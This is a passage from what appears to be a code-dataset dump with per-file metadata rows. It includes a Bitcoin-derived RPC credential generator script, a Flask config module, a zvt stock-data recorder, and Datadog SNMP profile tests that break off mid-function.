rp = FederationEntityOOB(None, 'https://rp.sunet.se')
l = rp.get_metadata_statement(metadata_statement, MetadataStatement,
'discovery')
assert l[0].iss == 'https://op.sunet.se'
assert l[0].fo == 'https://op.sunet.se'
assert l[0].le == {'foo':'bar'}
| 35.213542
| 83
| 0.633782
|
4d4db935980cef08c9a01f37d8841233ce019348
| 1,113
|
py
|
Python
|
share/rpcuser/rpcuser.py
|
VadiqueMe/dogecoin
|
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
|
[
"MIT"
] | 1
|
2021-01-03T13:55:19.000Z
|
2021-01-03T13:55:19.000Z
|
share/rpcuser/rpcuser.py
|
VadiqueMe/dogecoin
|
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
|
[
"MIT"
] | 2
|
2020-01-01T05:27:26.000Z
|
2021-01-06T08:04:47.000Z
|
share/rpcuser/rpcuser.py
|
VadiqueMe/dogecoin
|
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
|
[
"MIT"
] | 1
|
2021-01-03T13:39:37.000Z
|
2021-01-03T13:39:37.000Z
|
#!/usr/bin/env python2
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php
import hashlib
import sys
import os
from random import SystemRandom
import base64
import hmac
if len(sys.argv) < 2:
sys.stderr.write('Please include username as an argument.\n')
sys.exit(0)
username = sys.argv[1]
#This uses os.urandom() underneath
cryptogen = SystemRandom()
#Create 16 byte hex salt
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
hexseq = list(map(hex, salt_sequence))
salt = "".join([x[2:] for x in hexseq])
#Create 32 byte b64 password
password = base64.urlsafe_b64encode(os.urandom(32))
digestmod = hashlib.sha256
if sys.version_info.major >= 3:
password = password.decode('utf-8')
digestmod = 'SHA256'
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()
print("String to be appended to bitcoin.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password)
| 26.5
| 79
| 0.728661
|
85e15bb11c30c485cadae7a08d9507c19011677c
| 632
|
py
|
Python
|
config.py
|
jamietsadler/itx_nabla
|
c9696c75f9ca02796b9c89e4656013722f15b075
|
[
"MIT"
] | null | null | null |
config.py
|
jamietsadler/itx_nabla
|
c9696c75f9ca02796b9c89e4656013722f15b075
|
[
"MIT"
] | 60
|
2021-09-13T07:19:50.000Z
|
2022-03-29T07:18:18.000Z
|
config.py
|
jamietsadler/itx_nabla
|
c9696c75f9ca02796b9c89e4656013722f15b075
|
[
"MIT"
] | null | null | null |
"""Flask configuration."""
from os import environ, path
from dotenv import load_dotenv
basedir = path.abspath(path.dirname(__file__))
load_dotenv(path.join(basedir, '.env'))
class Config:
"""Set Flask config variables."""
FLASK_ENV = 'development'
TESTING = True
SECRET_KEY = environ.get('SECRET_KEY')
STATIC_FOLDER = 'static'
TEMPLATES_FOLDER = 'templates'
# Database
SQLALCHEMY_DATABASE_URI = environ.get('SQLALCHEMY_DATABASE_URI')
SQLALCHEMY_TRACK_MODIFICATIONS = False
# # AWS Secrets
# AWS_SECRET_KEY = environ.get('AWS_SECRET_KEY')
# AWS_KEY_ID = environ.get('AWS_KEY_ID')
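# Typical wiring (a sketch, not part of this module): a Flask application would load
# this class with, for example,
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.config.from_object('config.Config')
#
# after which values such as SQLALCHEMY_DATABASE_URI are available via app.config.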
| 26.333333
| 68
| 0.712025
|
5afee75a91dc41f48230b292ccc4813ddf9fab99
| 2,077
|
py
|
Python
|
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 1
|
2020-04-06T04:17:53.000Z
|
2020-04-06T04:17:53.000Z
|
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 2
|
2019-12-20T13:12:30.000Z
|
2020-01-03T06:24:30.000Z
|
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from zvdata.utils.pd_utils import pd_is_not_null
from zvdata.utils.time_utils import now_pd_timestamp
from zvdata.utils.utils import to_float
from zvt.api.api import get_dividend_financing, get_spo_detail
from zvt.domain import SpoDetail, DividendFinancing
from zvt.recorders.eastmoney.common import EastmoneyPageabeDataRecorder
class SPODetailRecorder(EastmoneyPageabeDataRecorder):
data_schema = SpoDetail
url = 'https://emh5.eastmoney.com/api/FenHongRongZi/GetZengFaMingXiList'
page_url = url
path_fields = ['ZengFaMingXiList']
def get_original_time_field(self):
return 'ZengFaShiJian'
def get_data_map(self):
return {
"spo_issues": ("ShiJiZengFa", to_float),
"spo_price": ("ZengFaJiaGe", to_float),
"spo_raising_fund": ("ShiJiMuJi", to_float)
}
def on_finish(self):
last_year = str(now_pd_timestamp().year)
codes = [item.code for item in self.entities]
need_filleds = get_dividend_financing(provider=self.provider, codes=codes,
return_type='domain',
session=self.session,
filters=[DividendFinancing.spo_raising_fund.is_(None)],
end_timestamp=last_year)
for item in need_filleds:
df = get_spo_detail(provider=self.provider, entity_id=item.entity_id,
columns=[SpoDetail.timestamp, SpoDetail.spo_raising_fund],
start_timestamp=item.timestamp,
end_timestamp="{}-12-31".format(item.timestamp.year))
if pd_is_not_null(df):
item.spo_raising_fund = df['spo_raising_fund'].sum()
self.session.commit()
super().on_finish()
__all__ = ['SPODetailRecorder']
if __name__ == '__main__':
# init_log('spo_detail.log')
recorder = SPODetailRecorder(codes=['000999'])
recorder.run()
| 38.462963
| 101
| 0.614829
|
04f3516c6d09788a13ae0fe4217bfa02721bc48b
| 82,178
|
py
|
Python
|
snmp/tests/test_profiles.py
|
szibis/integrations-core
|
e8eb6484a7aea40f5919929e02608cbe4babaacf
|
[
"BSD-3-Clause"
] | null | null | null |
snmp/tests/test_profiles.py
|
szibis/integrations-core
|
e8eb6484a7aea40f5919929e02608cbe4babaacf
|
[
"BSD-3-Clause"
] | null | null | null |
snmp/tests/test_profiles.py
|
szibis/integrations-core
|
e8eb6484a7aea40f5919929e02608cbe4babaacf
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import logging
import pytest
from datadog_checks.base import ConfigurationError
from datadog_checks.dev.utils import get_metadata_metrics
from datadog_checks.snmp import SnmpCheck
from datadog_checks.snmp.utils import get_profile_definition, recursively_expand_base_profiles
from . import common
from .metrics import (
ADAPTER_IF_COUNTS,
CCCA_ROUTER_GAUGES,
CIE_METRICS,
CPU_METRICS,
DISK_GAUGES,
DRS_GAUGES,
FRU_METRICS,
IF_COUNTS,
IF_GAUGES,
IF_RATES,
IP_COUNTS,
IP_IF_COUNTS,
IPX_COUNTS,
LTM_GAUGES,
LTM_NODES_COUNTS,
LTM_NODES_GAUGES,
LTM_NODES_RATES,
LTM_POOL_COUNTS,
LTM_POOL_GAUGES,
LTM_POOL_MEMBER_COUNTS,
LTM_POOL_MEMBER_GAUGES,
LTM_POOL_MEMBER_RATES,
LTM_POOL_RATES,
LTM_VIRTUAL_SERVER_COUNTS,
LTM_VIRTUAL_SERVER_GAUGES,
LTM_VIRTUAL_SERVER_RATES,
MEMORY_METRICS,
PEER_GAUGES,
PEER_RATES,
PROBE_GAUGES,
SYSTEM_STATUS_GAUGES,
TCP_COUNTS,
TCP_GAUGES,
UDP_COUNTS,
VOLTAGE_GAUGES,
)
pytestmark = common.python_autodiscovery_only
def test_load_profiles(caplog):
instance = common.generate_instance_config([])
check = SnmpCheck('snmp', {}, [instance])
caplog.set_level(logging.WARNING)
for name, profile in check.profiles.items():
try:
check._config.refresh_with_profile(profile)
except ConfigurationError as e:
pytest.fail("Profile `{}` is not configured correctly: {}".format(name, e))
assert "table doesn't have a 'metric_tags' section" not in caplog.text
caplog.clear()
def run_profile_check(recording_name):
"""
Run a single check with the provided `recording_name` used as
`community_string` by the docker SNMP endpoint.
"""
instance = common.generate_instance_config([])
instance['community_string'] = recording_name
instance['enforce_mib_constraints'] = False
check = SnmpCheck('snmp', {}, [instance])
check.check(instance)
@pytest.mark.unit
@pytest.mark.parametrize(
'definition_file, equivalent_definition',
[
pytest.param('_base_cisco.yaml', {'extends': ['_base.yaml', '_cisco-generic.yaml']}, id='generic'),
pytest.param(
'_base_cisco_voice.yaml',
{'extends': ['_base.yaml', '_cisco-generic.yaml', '_cisco-voice.yaml']},
id='voice',
),
],
)
def test_compat_cisco_base_profiles(definition_file, equivalent_definition):
# type: (str, dict) -> None
"""
Cisco and Cisco Voice base profiles were replaced by mixins (see Pull #6792).
But their definition files should still be present and contain equivalent metrics to ensure backward compatibility.
"""
definition = get_profile_definition({'definition_file': definition_file})
recursively_expand_base_profiles(definition)
recursively_expand_base_profiles(equivalent_definition)
assert definition == equivalent_definition
@pytest.mark.usefixtures("dd_environment")
def test_cisco_voice(aggregator):
run_profile_check('cisco_icm')
tags = ['snmp_profile:cisco_icm', 'snmp_host:test'] + common.CHECK_TAGS
resources = ["hrSWRunPerfMem", "hrSWRunPerfCPU"]
common.assert_common_metrics(aggregator, tags)
for resource in resources:
aggregator.assert_metric('snmp.{}'.format(resource), metric_type=aggregator.GAUGE, tags=tags)
run_indices = [4, 7, 8, 9, 10, 18, 24, 29, 30]
for index in run_indices:
status_tags = tags + ['run_index:{}'.format(index)]
aggregator.assert_metric('snmp.hrSWRunStatus', metric_type=aggregator.GAUGE, tags=status_tags)
cvp_gauges = [
"ccvpSipIntAvgLatency1",
"ccvpSipIntAvgLatency2",
"ccvpSipIntConnectsRcv",
"ccvpSipIntNewCalls",
"ccvpSipRtActiveCalls",
"ccvpSipRtTotalCallLegs",
"ccvpLicRtPortsInUse",
"ccvpLicAggMaxPortsInUse",
]
for cvp in cvp_gauges:
aggregator.assert_metric('snmp.{}'.format(cvp), metric_type=aggregator.GAUGE, tags=tags)
ccms_counts = ["ccmRejectedPhones", "ccmUnregisteredPhones"]
ccms_gauges = ["ccmRegisteredGateways", "ccmRegisteredPhones"]
for ccm in ccms_counts:
aggregator.assert_metric('snmp.{}'.format(ccm), metric_type=aggregator.RATE, tags=tags)
for ccm in ccms_gauges:
aggregator.assert_metric('snmp.{}'.format(ccm), metric_type=aggregator.GAUGE, tags=tags)
calls = [
"cvCallVolPeerIncomingCalls",
"cvCallVolPeerOutgoingCalls",
]
peers = [4, 13, 14, 17, 18, 22, 25, 30, 31]
for call in calls:
for peer in peers:
peer_tags = tags + ["peer_index:{}".format(peer)]
aggregator.assert_metric('snmp.{}'.format(call), metric_type=aggregator.GAUGE, tags=peer_tags)
calls = [
"cvCallVolMediaIncomingCalls",
"cvCallVolMediaOutgoingCalls",
]
for call in calls:
aggregator.assert_metric('snmp.{}'.format(call), metric_type=aggregator.GAUGE, tags=tags)
dial_controls = [
"dialCtlPeerStatsAcceptCalls",
"dialCtlPeerStatsFailCalls",
"dialCtlPeerStatsRefuseCalls",
"dialCtlPeerStatsSuccessCalls",
]
for ctl in dial_controls:
aggregator.assert_metric(
'snmp.{}'.format(ctl), metric_type=aggregator.MONOTONIC_COUNT, tags=["peer_index:7"] + tags
)
pim_tags = tags + ['pim_host:test', 'pim_name:name', 'pim_num:2']
aggregator.assert_metric('snmp.{}'.format("cccaPimStatus"), metric_type=aggregator.GAUGE, tags=pim_tags)
aggregator.assert_metric('snmp.{}'.format("sysUpTimeInstance"), metric_type=aggregator.GAUGE, tags=tags, count=1)
instance_numbers = ['4446', '5179', '12093', '19363', '25033', '37738', '42562', '51845', '62906', '63361']
for metric in CCCA_ROUTER_GAUGES:
for instance_number in instance_numbers:
instance_tags = tags + ['instance_number:{}'.format(instance_number)]
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=instance_tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_f5(aggregator):
run_profile_check('f5')
gauges = [
'sysStatMemoryTotal',
'sysStatMemoryUsed',
'sysGlobalTmmStatMemoryTotal',
'sysGlobalTmmStatMemoryUsed',
'sysGlobalHostOtherMemoryTotal',
'sysGlobalHostOtherMemoryUsed',
'sysGlobalHostSwapTotal',
'sysGlobalHostSwapUsed',
'sysTcpStatOpen',
'sysTcpStatCloseWait',
'sysTcpStatFinWait',
'sysTcpStatTimeWait',
'sysUdpStatOpen',
'sysClientsslStatCurConns',
]
counts = [
'sysTcpStatAccepts',
'sysTcpStatAcceptfails',
'sysTcpStatConnects',
'sysTcpStatConnfails',
'sysUdpStatAccepts',
'sysUdpStatAcceptfails',
'sysUdpStatConnects',
'sysUdpStatConnfails',
'sysClientsslStatEncryptedBytesIn',
'sysClientsslStatEncryptedBytesOut',
'sysClientsslStatDecryptedBytesIn',
'sysClientsslStatDecryptedBytesOut',
'sysClientsslStatHandshakeFailures',
]
cpu_rates = [
'sysMultiHostCpuUser',
'sysMultiHostCpuNice',
'sysMultiHostCpuSystem',
'sysMultiHostCpuIdle',
'sysMultiHostCpuIrq',
'sysMultiHostCpuSoftirq',
'sysMultiHostCpuIowait',
]
interfaces = ['1.0', 'mgmt', '/Common/internal', '/Common/http-tunnel', '/Common/socks-tunnel']
tags = ['snmp_profile:f5-big-ip', 'snmp_host:f5-big-ip-adc-good-byol-1-vm.c.datadog-integrations-lab.internal']
tags += common.CHECK_TAGS
common.assert_common_metrics(aggregator, tags)
for metric in gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in counts:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for metric in cpu_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=['cpu:0'] + tags, count=1)
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=['cpu:1'] + tags, count=1)
for interface in interfaces:
interface_tags = ['interface:{}'.format(interface)] + tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=interface_tags, count=1,
)
for metric in IF_RATES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=interface_tags, count=1
)
for metric in IF_GAUGES:
for interface in interfaces:
aggregator.assert_metric(
'snmp.{}'.format(metric),
metric_type=aggregator.GAUGE,
tags=['interface:{}'.format(interface)] + tags,
count=1,
)
for version in ['ipv4', 'ipv6']:
ip_tags = ['ipversion:{}'.format(version)] + tags
for metric in IP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=ip_tags, count=1
)
for metric in LTM_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
servers = ['server1', 'server2', 'server3']
for server in servers:
server_tags = tags + ['server:{}'.format(server)]
for metric in LTM_VIRTUAL_SERVER_GAUGES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=server_tags, count=1,
)
for metric in LTM_VIRTUAL_SERVER_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=server_tags, count=1,
)
for metric in LTM_VIRTUAL_SERVER_RATES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=server_tags, count=1,
)
nodes = ['node1', 'node2', 'node3']
for node in nodes:
node_tags = tags + ['node:{}'.format(node)]
for metric in LTM_NODES_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=node_tags, count=1)
for metric in LTM_NODES_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=node_tags, count=1
)
for metric in LTM_NODES_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=node_tags, count=1)
pools = ['pool1', 'pool2']
for pool in pools:
pool_tags = tags + ['pool:{}'.format(pool)]
for metric in LTM_POOL_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=pool_tags, count=1)
for metric in LTM_POOL_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=pool_tags, count=1
)
for metric in LTM_POOL_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=pool_tags, count=1)
pool_members = [('pool1', 'node1'), ('pool1', 'node2'), ('pool2', 'node3')]
for pool, node in pool_members:
pool_member_tags = tags + ['pool:{}'.format(pool), 'node:{}'.format(node)]
for metric in LTM_POOL_MEMBER_GAUGES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=pool_member_tags, count=1
)
for metric in LTM_POOL_MEMBER_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=pool_member_tags, count=1
)
for metric in LTM_POOL_MEMBER_RATES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=pool_member_tags, count=1
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_router(aggregator):
run_profile_check('network')
common_tags = common.CHECK_TAGS + ['snmp_profile:generic-router']
common.assert_common_metrics(aggregator, common_tags)
for interface in ['eth0', 'eth1']:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for version in ['ipv4', 'ipv6']:
tags = ['ipversion:{}'.format(version)] + common_tags
for metric in IP_COUNTS + IPX_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IP_IF_COUNTS:
for interface in ['17', '21']:
tags = ['ipversion:{}'.format(version), 'interface:{}'.format(interface)] + common_tags
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_f5_router(aggregator):
# Use the generic profile against the f5 device
instance = common.generate_instance_config([])
instance['community_string'] = 'f5'
instance['enforce_mib_constraints'] = False
init_config = {'profiles': {'router': {'definition_file': 'generic-router.yaml'}}}
check = SnmpCheck('snmp', init_config, [instance])
check.check(instance)
interfaces = ['1.0', 'mgmt', '/Common/internal', '/Common/http-tunnel', '/Common/socks-tunnel']
common_tags = ['snmp_profile:router', 'snmp_host:f5-big-ip-adc-good-byol-1-vm.c.datadog-integrations-lab.internal']
common_tags.extend(common.CHECK_TAGS)
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for version in ['ipv4', 'ipv6']:
tags = ['ipversion:{}'.format(version)] + common_tags
for metric in IP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_3850(aggregator):
run_profile_check('3850')
# We're not covering all interfaces
interfaces = ["Gi1/0/{}".format(i) for i in range(1, 48)]
common_tags = common.CHECK_TAGS + ['snmp_host:Cat-3850-4th-Floor.companyname.local', 'snmp_profile:cisco-3850']
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IP_COUNTS + IPX_COUNTS:
tags = common_tags + ['ipversion:ipv6']
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
sensors = [1006, 1007, 1008, 2006, 2007, 2008]
for sensor in sensors:
tags = ['sensor_id:{}'.format(sensor), 'sensor_type:8'] + common_tags
aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1)
frus = [1001, 1010, 2001, 2010]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpus = [1000, 2000]
for cpu in cpus:
tags = ['cpu:{}'.format(cpu)] + common_tags
for metric in CPU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in CIE_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for source in range(1, 3):
env_tags = ['power_source:{}'.format(source)]
aggregator.assert_metric(
'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=env_tags + common_tags
)
aggregator.assert_metric(
'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=common_tags,
)
aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE)
for switch, mac_addr in [(1, '0x046c9d42b080'), (2, '0xdccec1430680')]:
tags = ['entity_name:Switch {}'.format(switch), 'mac_addr:{}'.format(mac_addr)] + common_tags
aggregator.assert_metric('snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=tags)
frus = [1011, 1012, 1013, 2011, 2012, 2013]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
aggregator.assert_metric(
'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags
)
for metrics in MEMORY_METRICS:
for pool in ['Processor', 'IOS Process stack']:
tags = ['mem_pool_name:{}'.format(pool)] + common_tags
aggregator.assert_metric('snmp.{}'.format(metrics), metric_type=aggregator.GAUGE, tags=tags)
neighbor_metrics = [
('ospfNbrEvents', aggregator.RATE),
('ospfNbrState', aggregator.GAUGE),
('ospfNbrLsRetransQLen', aggregator.GAUGE),
]
for metric, metric_type in neighbor_metrics:
tags = ['neighbor_ip:192.29.116.26', 'neighbor_id:192.29.66.79'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1)
lls_metrics = ['ospfIfRetransInterval', 'ospfIfState']
for metric in lls_metrics:
tags = ['ospf_ip_addr:192.29.116.25'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for temp_index in [1006, 1007, 1008, 2006, 2007, 2008]:
env_tag = ['temp_index:{}'.format(temp_index), 'temp_state:1']
aggregator.assert_metric(
'snmp.ciscoEnvMonTemperatureStatusValue', metric_type=aggregator.GAUGE, tags=env_tag + common_tags
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_meraki_cloud_controller(aggregator):
run_profile_check('meraki-cloud-controller')
common_tags = common.CHECK_TAGS + ['snmp_profile:meraki-cloud-controller', 'snmp_host:dashboard.meraki.com']
common.assert_common_metrics(aggregator, common_tags)
dev_metrics = ['devStatus', 'devClientCount']
dev_tags = ['device:Gymnasium', 'product:MR16-HW', 'network:L_NETWORK'] + common_tags
for metric in dev_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=dev_tags, count=1)
if_tags = ['interface:wifi0', 'index:4'] + common_tags
if_metrics = ['devInterfaceSentPkts', 'devInterfaceRecvPkts', 'devInterfaceSentBytes', 'devInterfaceRecvBytes']
for metric in if_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
# IF-MIB
if_tags = ['interface:eth0'] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_idrac(aggregator):
run_profile_check('idrac')
interfaces = ['eth0', 'en1']
common_tags = common.CHECK_TAGS + ['snmp_profile:idrac']
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['adapter:{}'.format(interface)] + common_tags
for count in ADAPTER_IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(count), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
indexes = ['26', '29']
for index in indexes:
tags = ['chassis_index:{}'.format(index)] + common_tags
for gauge in SYSTEM_STATUS_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
powers = ['supply1', 'supply2']
for power in powers:
tags = ['supply_name:{}'.format(power)] + common_tags
aggregator.assert_metric('snmp.enclosurePowerSupplyState', metric_type=aggregator.GAUGE, tags=tags, count=1)
disks = ['disk1', 'disk2']
for disk in disks:
tags = ['disk_name:{}'.format(disk)] + common_tags
for gauge in DISK_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
batteries = ['battery1', 'battery2']
for battery_name in batteries:
tags = ['battery_name:{}'.format(battery_name)] + common_tags
aggregator.assert_metric('snmp.{}'.format("batteryState"), metric_type=aggregator.GAUGE, tags=tags, count=1)
controllers = ['controller1', 'controller2']
for controller in controllers:
tags = ['controller_name:{}'.format(controller)] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("controllerRollUpStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1
)
devices = ['device1', 'device2']
indexes = ['10', '20']
for device, index in zip(devices, indexes):
tags = ['device_descr_name:{}'.format(device), 'chassis_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.{}'.format("pCIDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1)
slots = ['slot1', 'slot2']
indexes = ['19', '21']
for slot, index in zip(slots, indexes):
tags = ['slot_name:{}'.format(slot), 'chassis_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.{}'.format("systemSlotStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1)
tag_mappings = [('29', 'device2', '0x9e00e0291401'), ('3', 'device1', '0x9e00e0291401')]
for index, device, mac in tag_mappings:
tags = [
'chassis_index:{}'.format(index),
'device_fqdd:{}'.format(device),
'mac_addr:{}'.format(mac),
] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("networkDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1
)
indexes = ['3', '31']
for index in indexes:
tags = ['chassis_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.{}'.format("systemBIOSStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1)
indexes = ['9', '18']
probe_types = ['26', '26']
for index, probe_type in zip(indexes, probe_types):
tags = ['chassis_index:{}'.format(index), 'probe_type:{}'.format(probe_type)] + common_tags
for gauge in PROBE_GAUGES:
